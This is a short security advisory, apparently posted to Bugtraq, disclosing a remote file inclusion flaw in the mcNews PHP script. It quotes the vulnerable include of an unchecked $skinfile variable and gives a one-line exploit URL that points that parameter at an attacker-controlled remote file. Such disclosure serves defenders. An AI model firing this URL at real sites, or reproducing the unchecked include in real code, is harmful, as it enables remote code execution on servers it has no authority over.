mcNews (skinfile) Remote File Include Vulnerability

From: ilkerkandemir@mynet.com
To: bugtraq@securityfocus.com
Cc:
Subject: mcNews (skinfile) Remote File Include Vulnerability
Date:


-------------------------------------------------------------------------------------------------------------------
MEFISTO PreSents...


Script: mcNews
Script Download: ftp://ftp1.comscripts.com/PHP/845_mcnews-13.zip
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
/*  MEFISTO  */

-------------------------------------------------------------------------------------------------------------------
Code:
if($voir!='') {
  $skinfile=strstr($skinfile, 'skin');
include ("$skinfile");

-------------------------------------------------------------------------------------------------------------------
Exploit:

http://[site]/[news_path]/admin/header.php?skinfile=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:dumenci,h0tturk,ajann

# MefistoLabs.Com





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.